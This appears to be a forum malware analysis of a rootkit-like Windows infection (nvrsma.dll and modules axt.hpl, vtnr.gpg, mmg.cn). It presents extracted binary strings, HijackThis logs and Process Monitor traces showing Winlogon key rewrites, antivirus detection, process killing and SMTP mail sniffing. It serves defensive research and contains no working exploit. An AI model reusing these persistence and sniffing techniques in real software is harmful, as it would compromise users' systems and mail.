0000F268 10010068 0 <white list empty>
0000F280 10010080 0 <black list empty>
0000F466 10012066 0 VS_VERSION_INFO
0000F4C2 100120C2 0 StringFileInfo
0000F4E6 100120E6 0 040904B0
0000F4FE 100120FE 0 CompanyName
0000F51E 1001211E 0 FileDescription
0000F540 10012140 0 ModMalwareRemover DLL
0000F572 10012172 0 FileVersion
0000F58C 1001218C 0 1, 0, 0, 1
0000F5AA 100121AA 0 InternalName
0000F5C4 100121C4 0 ModMalwareRemover
0000F5EE 100121EE 0 LegalCopyright
0000F60C 1001220C 0 Copyright © 2007
0000F63A 1001223A 0 LegalTrademarks
0000F662 10012262 0 OriginalFilename
0000F684 10012284 0 ModMalwareRemover.DLL
0000F6B6 100122B6 0 ProductName
0000F6D0 100122D0 0 ModMalwareRemover Dynamic Link Library
0000F726 10012326 0 ProductVersion
0000F744 10012344 0 1, 0, 0, 1
0000F762 10012362 0 VarFileInfo
0000F782 10012382 0 Translation

mmg.cn

CODE
00003340 10004B40 0 ModMailGrabber.dll
0000337E 10004B7E 0 OnKernelEventReceived
00003C78 10005878 0 ModMailGrabber
00003C88 10005888 0 i think we are found SMTP outoing mail
00003CB0 100058B0 0 rcpt bcc:
00003CBC 100058BC 0 rcpt to:
00003CCC 100058CC 0 Making notify with theese mails
00003CF4 100058F4 0 Senging mails
00003D04 10005904 0 CheckMailList
00003D14 10005914 0 NotifyServer
00003D28 10005928 0 ModuleStartup Occured
00003D40 10005940 0 BcmdCode==2 Calling STOP Sniffing
00003D64 10005964 0 BcmdCode==1 Calling START Sniffing
00003D88 10005988 0 RECVD::DATA =
00003D98 10005998 0 Recvng Mail to Unduplicate
00003DB4 100059B4 0 Notify from ModuleID 1
00003DCC 100059CC 0 ClosingKernelEvent RECVD
00003DE8 100059E8 0 MODULE_UNLOADREQ..UnloadingModule
00003E10 10005A10 0 OnKernelEventReceived called
00003E34 10005A34 0 .log.htm
00003E40 10005A40 0 main.log.htm
00003E58 10005A58 0 %s -> %s
00003EAC 10005AAC 0 Notice
00003EB8 10005AB8 0 green
00003EC0 10005AC0 0 Warning!
00003ED0 10005AD0 0 "#DA8E03"
00003EDC 10005ADC 0 ERROR
00003EEC 10005AEC 0 TempData
00003F08 10005B08 0 (%s):: %.2d:%.2d:%.2d / GetTickCount(%08u);GetCurrentThreadId(%08x); TEXT(%s)
00003FA0 10005BA0 0 (%s):: %.2d:%.2d:%.2d / GetTickCount(%08u);GetCurrentThreadId(%08x); TEXT(%s)

Test

I’ve spend most of the weekend trying to assemble the pieces of the puzzle. While winlogon.exe activity is rather limited on an idle and clean computer, I got a 154 MB log in 30 minutes with this bugger installed using filters in Process Monitor.

Normal winlogon.exe activity looks like this:

QUOTE
winlogon.exe Thread Create SUCCESS Thread ID: 248
winlogon.exe RegOpenKey HKCU SUCCESS Desired Access: Read
winlogon.exe RegOpenKey HKCU\AppEvents\Schemes\Apps\.Default\Maximize\.Current SUCCESS Desired Access: Read
winlogon.exe RegQueryValue HKCU\AppEvents\Schemes\Apps\.Default\Maximize\.Current\(Default) SUCCESS Type: REG_SZ, Length: 2, Data:
winlogon.exe RegCloseKey HKCU\AppEvents\Schemes\Apps\.Default\Maximize\.Current SUCCESS
winlogon.exe RegCloseKey HKCU SUCCESS
winlogon.exe RegOpenKey HKCU SUCCESS Desired Access: Read
winlogon.exe RegOpenKey HKCU\AppEvents\Schemes\Apps\.Default\Maximize\.Current\Active NAME NOT FOUND Desired Access: Read
winlogon.exe RegQueryValue HKCU\(Default) NAME NOT FOUND Length: 536
winlogon.exe RegCloseKey HKCU SUCCESS
winlogon.exe RegOpenKey HKLM\Software\Microsoft\Windows\CurrentVersion SUCCESS Desired Access: Read
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Software\Microsoft\Windows\CurrentVersion NAME NOT FOUND Desired Access: Read
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MediaPath SUCCESS Type: REG_SZ, Length: 34, Data: C:\WINDOWS\Media
winlogon.exe RegCloseKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion SUCCESS
winlogon.exe Thread Exit SUCCESS User Time: 0.0000000, Kernel Time: 0.0000000

18.exe has 2 resources, nvrsma.dll (which poses as a Nvidia driver / language pack)

and a rootkit cleaner. The file carries a list of existing rootkits.
As I did suspect vtnr.gpg cleaning out / resetting stuff upon reboot, I decided to install some malware first. A banker, a searchengine hijacker, a LSP hijacker, winlogon + deflib.sys rootkit and ntos rootkit. Unfortunately 18.exe did not install with ntos on board, I had to remove it myself prior to 18.exe install but I did leave the entry under the userinit key (Gives an error upon reboot but PC does start).

I also installed AVG antispyware, Spywareblaster and Spybot Search & Destroy since several program strings are mentioned in axt.hpl.

Hijackthis Before install:

QUOTE
Logfile of Trend Micro HijackThis v2.0.2
Boot mode: Normal

F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
O2 - BHO: Google Module - {B87D203B-B43D-4af9-9E1B-9C20478CBB74} - tardm2.dll (file missing)
O2 - BHO: e404 helper - {F10587E9-0E47-4CBE-84AE-7DD20B8684BB} - C:\Program Files\Helper\superfinderusa.dll
O4 - HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual Machine Additions\vmusrvc.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Firewall auto setup] C:\DOCUME~1\KLY\LOCALS~1\Temp\winlogon.exe
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'Default user')
O10 - Unknown file in Winsock LSP: wsock3.dll
O10 - Unknown file in Winsock LSP: wsock3.dll
O10 - Unknown file in Winsock LSP: wsock3.dll
O10 - Unknown file in Winsock LSP: wsock3.dll
O23 - Service: Virtual Machine Additions Services Application (1-vmsrvc) - Microsoft Corporation - C:\Program Files\Virtual Machine Additions\vmsrvc.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

After:

QUOTE
Logfile of Trend Micro HijackThis v2.0.2
Boot mode: Normal

F2 - REG:system.ini: Shell=c:\windows\explorer.exe
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
O2 - BHO: e404 helper - {F10587E9-0E47-4CBE-84AE-7DD20B8684BB} - C:\Program Files\Helper\superfinderusa.dll
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Firewall auto setup] C:\DOCUME~1\KLY\LOCALS~1\Temp\winlogon.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

Note: I left out non related entries in the HJT logs.

As you can see, some things got wiped out. vtnr.gpg did remove a BHO, the hijacked winsock, did reset the F2 values but it also destroyed all services related to my VM. Previous versions also killed several other O4 entries (MSN Messenger included) and their associated processes got killed. Although 18.exe has that rootkit cleaning program as a resource, it wasn’t able to clean out the winlogon + deflib.sys rootkit. A Bug or still an inactive feature … I haven’t got the slightest idea. The resource didn’t get dropped on the computer, that’s for sure.

Notes

Once axt.hpl and vtnr.gpg dropped (they are 2 ressources of nvrsma.dll) a system scan is performed. Several registry keys are enumerated. Internet setting, Internet Zone settings, Dns Cache and TCP/IP parameters, 1 level of the complete HKLM\Software key, to name only a few.

QUOTE
winlogon.exe RegEnumKey HKLM\SOFTWARE SUCCESS Index: 1, Name: 2
winlogon.exe RegOpenKey HKLM\Software\2 SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\2 SUCCESS
winlogon.exe RegEnumKey HKLM\SOFTWARE SUCCESS Index: 2, Name: AutoIt v3
winlogon.exe RegOpenKey HKLM\Software\AutoIt v3 SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\AutoIt v3 SUCCESS
winlogon.exe RegEnumKey HKLM\SOFTWARE SUCCESS Index: 3, Name: C07ft5Y
winlogon.exe RegOpenKey HKLM\Software\C07ft5Y SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\C07ft5Y SUCCESS
winlogon.exe RegEnumKey HKLM\SOFTWARE SUCCESS Index: 4, Name: Classes
etc ....

In the strings of axt.hpl, we notice the presence of several anti-spyware and antivirus products. The module simply checks their presence on the computer. No keys are deleted and no programs are uninstalled.

QUOTE
winlogon.exe RegOpenKey HKLM\Software\KasperskyLab SUCCESS Desired Access: Read
winlogon.exe RegCloseKey HKLM\SOFTWARE\KasperskyLab SUCCESS
winlogon.exe RegOpenKey HKLM\Software\McAfee\VirusScan SUCCESS Desired Access: Read
winlogon.exe RegCloseKey HKLM\SOFTWARE\McAfee\VirusScan SUCCESS
winlogon.exe RegOpenKey HKLM\Software\Symantec\Symantec AntiVirus NAME NOT FOUND Desired Access: Read
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ClamAV NAME NOT FOUND Desired Access: Read
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AntiVir PersonalEdition Classic NAME NOT FOUND Desired Access: Read
etc ....

axt.hpl also sends out spam as we saw earlier. Temporary Internet folders are used to store *.htm documents. Once treated, the module cleans up the TIF files so that no traces subsist.

vtnr.gpg fixes the registry keys. For run keys it checks if the program really exists on the HDD. It also enumerates C:\Documents and Settings\All Users\Start Menu\Programs\Startup and C:\Documents and Settings\[user name]\Start Menu\Programs\Startup folders.

QUOTE
winlogon.exe IRP_MJ_CREATE C:\Documents and Settings\All Users\Start Menu\Programs\Startup SUCCESS Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-alert, Attributes: n/a, ShareMode: Read, Write, AllocationSize: n/a, OpenResult: Opened
winlogon.exe IRP_MJ_DIRECTORY_CONTROL C:\Documents and Settings\All Users\Start Menu\Programs\Startup\* SUCCESS Type: QueryDirectory, Filter: *, 2: .
winlogon.exe IRP_MJ_DIRECTORY_CONTROL C:\Documents and Settings\All Users\Start Menu\Programs\Startup SUCCESS Type: QueryDirectory, 1: .., 2: desktop.ini
winlogon.exe IRP_MJ_DIRECTORY_CONTROL C:\Documents and Settings\All Users\Start Menu\Programs\Startup NO MORE FILES Type: QueryDirectory
winlogon.exe IRP_MJ_CLEANUP C:\Documents and Settings\All Users\Start Menu\Programs\Startup SUCCESS
winlogon.exe IRP_MJ_CLOSE C:\Documents and Settings\All Users\Start Menu\Programs\Startup SUCCESS

Below you can clearly see it changing the Shell and Userinit values using RegSetValue.

QUOTE
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows SUCCESS
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell SUCCESS Type: REG_SZ, Length: 26, Data: Explorer.exe
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell SUCCESS Type: REG_SZ, Length: 26, Data: Explorer.exe
winlogon.exe RegSetValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell SUCCESS Type: REG_SZ, Length: 48, Data: c:\windows\explorer.exe
winlogon.exe IRP_MJ_SET_INFORMATION C:\WINDOWS\system32\config\software.LOG SUCCESS Type: SetEndOfFileInformationFile, EndOfFile: 20,480
winlogon.exe IRP_MJ_SET_INFORMATION C:\WINDOWS\system32\config\software.LOG SUCCESS Type: SetEndOfFileInformationFile, EndOfFile: 24,576
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit SUCCESS Type: REG_SZ, Length: 68, Data: C:\WINDOWS\system32\userinit.exe,
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit SUCCESS Type: REG_SZ, Length: 68, Data: C:\WINDOWS\system32\userinit.exe,
winlogon.exe RegSetValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit SUCCESS Type: REG_SZ, Length: 66, Data: c:\windows\system32\userinit.exe
winlogon.exe Thread Exit SUCCESS User Time: 0.7711088, Kernel Time: 1.2718288

The module also enumerates all services installed on the computer by querying the HKLM\System\CurrentControlSet key. For certain services a FileExists is also performed.

QUOTE
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 0, Name: 1-driver-vmsrvc
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 1, Name: 1-vmsrvc
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 2, Name: Abiosdsk
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 3, Name: abp480n5
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 4, Name: ACPI
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 5, Name: ACPIEC
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 6, Name: adpu160m
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 7, Name: aec
etc ....

Earlier I did mention that some programs are killed when running. In the excerpt below Hijackthis gets killed after the following requests:

QUOTE
winlogon.exe IRP_MJ_CREATE C:\Tools\hijackthis.exe SUCCESS Desired Access: Generic Read, Disposition: Open, Options: Synchronous IO Non-alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a, OpenResult: Opened
winlogon.exe FASTIO_ACQUIRE_FOR_SECTION_SYNCHRONIZATION C:\Tools\HiJackThis.exe SUCCESS SyncType: SyncTypeCreateSection, PageProtection: PAGE_READONLY
winlogon.exe FASTIO_QUERY_INFORMATION C:\Tools\HiJackThis.exe SUCCESS Type: QueryStandardInformationFile, AllocationSize: 405,504, EndOfFile: 401,720, NumberOfLinks: 1, DeletePending: False, Directory: False
winlogon.exe FASTIO_RELEASE_FOR_SECTION_SYNCHRONIZATION C:\Tools\HiJackThis.exe SUCCESS
winlogon.exe FASTIO_ACQUIRE_FOR_SECTION_SYNCHRONIZATION C:\Tools\HiJackThis.exe SUCCESS SyncType: SyncTypeOther
winlogon.exe FASTIO_RELEASE_FOR_SECTION_SYNCHRONIZATION C:\Tools\HiJackThis.exe SUCCESS
winlogon.exe IRP_MJ_CLEANUP C:\Tools\HiJackThis.exe SUCCESS
winlogon.exe IRP_MJ_CLOSE C:\Tools\HiJackThis.exe SUCCESS
HiJackThis.exe Thread Exit SUCCESS User Time: 0.1702448, Kernel Time: 0.4406336
HiJackThis.exe Process Exit SUCCESS Exit Status: 259, User Time: 0.1802592, Kernel Time: 0.3705328
HiJackThis.exe IRP_MJ_CLEANUP C:\Tools SUCCESS
HiJackThis.exe IRP_MJ_CLOSE C:\Tools SUCCESS
HiJackThis.exe IRP_MJ_CLEANUP C:\Documents and Settings\KLY\Local Settings\Temp\~DFD6FC.tmp SUCCESS
HiJackThis.exe IRP_MJ_CLEANUP C:\WINDOWS\system32\msvbvm60.dll SUCCESS
HiJackThis.exe IRP_MJ_CLEANUP C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9 SUCCESS
HiJackThis.exe IRP_MJ_CLOSE C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9 SUCCESS
HiJackThis.exe IRP_MJ_CLEANUP C:\WINDOWS\system32\stdole2.tlb SUCCESS

I don’t think it’s on purpose, the same “instructions” are applied to all running processes but they don’t get killed. Occasionally it does happen with ProcessGuard too. In the past MSN Messenger got terminated also but it doesn’t happen anymore.

As for mmg.cn, the purpose is clear … sniffing outgoing SMTP mail. I don’t think that needs further explanation or testing.

When bringing up detailed information about an operation; one sees 2 or more unknown modules in the stack during non standard winlogon.exe operations. That is the only “visible” sign of the xored files being loaded.

Each application tries to load nvrsma.dll but gets indeed a SHARING VIOLATION error. The sample below shows HijackThis process.

QUOTE
64755 3:55:09.4755677 PM HiJackThis.exe 948 QueryOpen C:\WINDOWS\system32\nvrsma.dll FAST IO DISALLOWED
64756 3:55:09.4759789 PM HiJackThis.exe 948 CreateFile C:\WINDOWS\system32\nvrsma.dll SUCCESS Desired Access: Read Attributes, Disposition: Open, Options: Open Reparse Point, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, OpenResult: Opened
64791 3:55:09.4856879 PM HiJackThis.exe 948 QueryBasicInformationFile C:\WINDOWS\system32\nvrsma.dll SUCCESS CreationTime: 1/6/2008 3:52:20 PM, LastAccessTime: 1/6/2008 3:53:14 PM, LastWriteTime: 1/6/2008 3:52:20 PM, ChangeTime: 1/6/2008 3:52:20 PM, FileAttributes: A
64793 3:55:09.4864531 PM HiJackThis.exe 948 CloseFile C:\WINDOWS\system32\nvrsma.dll SUCCESS
64801 3:55:09.4881195 PM HiJackThis.exe 948 CreateFile C:\WINDOWS\system32\nvrsma.dll SHARING VIOLATION Desired Access: Execute/Traverse, Synchronize, Disposition: Open, Options: Synchronous IO Non-alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a

Conclusion

This infection is very complex. All the different modules relay / depend on each other and debugging is very difficult. It clearly has rootkit behaviour.

Passwords and all sensitive information should be changed after a cleanup. Do not attempt to clean out this infection yourself, seek help on the forums instead. If user32.dll gets deleted by your antivirus software, you’ll end up with a new desktop picture during next boot.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.